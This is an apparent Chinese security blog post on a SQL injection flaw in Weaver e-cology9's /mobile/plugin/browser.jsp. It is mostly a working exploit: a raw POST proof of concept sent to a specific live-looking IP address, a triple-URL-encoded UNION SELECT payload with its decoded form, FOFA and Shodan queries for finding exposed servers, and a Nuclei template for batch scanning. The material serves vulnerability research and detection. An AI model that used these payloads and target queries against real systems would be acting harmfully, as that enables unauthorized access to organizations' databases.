526互联

泛微E-cology9 browser.jsp SQL注入漏洞QVD-2023-5012

发布时间 2023-09-04 16:07:35作者: 学安全的小白

漏洞简介

泛微e-cology9存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

影响版本

泛微e-cology V9<10.56

漏洞复现

fofa语法:app="泛微-协同商务系统"
登录页面:

POC:

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: 115.236.39.115:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 649

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

keyword参数后面的值是以下语句经过三次url编码后得到的。
a' union select 1,''+(SELECT @@VERSION)+'

nuclei批量yaml文件

id: CNVD-2023-12632

info:
  name: E-Cology V9 - SQL Injection
  author: daffainfo
  severity: high
  description: |
    Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
  reference:
    - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
    - https://blog.csdn.net/qq_50854662/article/details/129992329
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="泛微-协同商务系统"
    shodan-query: 'ecology_JSessionid'
  tags: cnvd,cnvd2023,ecology,sqli

# a' union select 1,''+(SELECT md5(9999999))+'
# URL encoded 3 times

http:
  - raw:
      - |
        POST /mobile/plugin/browser.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '283f42764da6dba2522412916b031080'
          - '"autoCount"'
          - '"autoGet"'
        condition: and

      - type: status
        status:
          - 200